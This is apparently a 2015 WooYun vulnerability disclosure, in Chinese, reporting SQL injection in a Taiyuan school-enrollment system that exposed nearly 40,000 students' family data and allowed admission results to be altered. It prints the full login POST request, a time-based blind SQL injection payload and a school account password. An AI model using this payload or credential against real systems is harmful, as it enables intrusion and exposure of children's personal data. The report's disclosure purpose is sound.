当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134034

漏洞标题:某小升初系统漏洞,导致泄露近4万学生个人家庭详细信息/可任意修改录取学校

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-08-17 21:35

修复时间:2015-10-03 10:52

公开时间:2015-10-03 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-19: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

各位家长还在担心孩子的小升初问题吗?还在到处花钱找关系只为上一个好学校吗?

详细说明:

某地区小升初系统漏洞,导致泄露近4万学生个人家庭详细信息/任意修改录取学校
话说两年小升初都成网上报名了
太原小升初报名
**.**.**.**:8080//xsc/mbzy/main.vm

2345截图20150814083942.png


找找注入吧,一下就发现好几个,上一个。

POST /xsc/volunteer/operation.do?method=login HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Cookie: JSESSIONID=1796A8F7C05B5F645A4B912AF8E86057
Referer: **.**.**.**:8080/xsc/mbzy/login1.vm
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; 2345Explorer/**.**.**.**6)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 27
Host: **.**.**.**:8080
Pragma: no-cache
stuXjh=11111111&pwd=1111111


---
Parameter: pwd (POST)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: stuXjh=11111111&pwd=111111111 ' AND (SELECT * FROM (SELECT(SLEEP(5)))rqEv) AND 'iKin'='iKin
---
back-end DBMS: MySQL 5.0.11


2345截图20150812120722.png


OK...TM注入慢死,找系统密码费了我好几个小时

2345截图20150813202954.png


**.**.**.**:8080/xsc/
系统登陆地址
就放个学校登陆账号密码给审核登陆验证下吧
0101/123456

2345截图20150812124736.png


2345截图20150812145120.png


以下是用系统管理用户登录所查看
来看看有多少学生信息吧

2345截图20150812191536.png


2345截图20150812125932.png


资料真是详细 (忘打码了....)

2345截图20150814084801.png


2345截图20150812192319.png


信息真够多,但再看看管理还有什么其他功能

2345截图20150812191745.png


2345截图20150812191811.png


竟然可以修改录取学校
虽然是民办学校报名系统,但却也可以改录取成为其他公办学校

2345截图20150813202954.png


漏洞证明:

Parameter: pwd (POST)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: stuXjh=11111111&pwd=111111111 ' AND (SELECT * FROM (SELECT(SLEEP(5)))rqEv) AND 'iKin'='iKin
---
back-end DBMS: MySQL 5.0.11

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-19 10:51

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山西分中心,由其后续协调网站管理单位处置。

最新状态:

暂无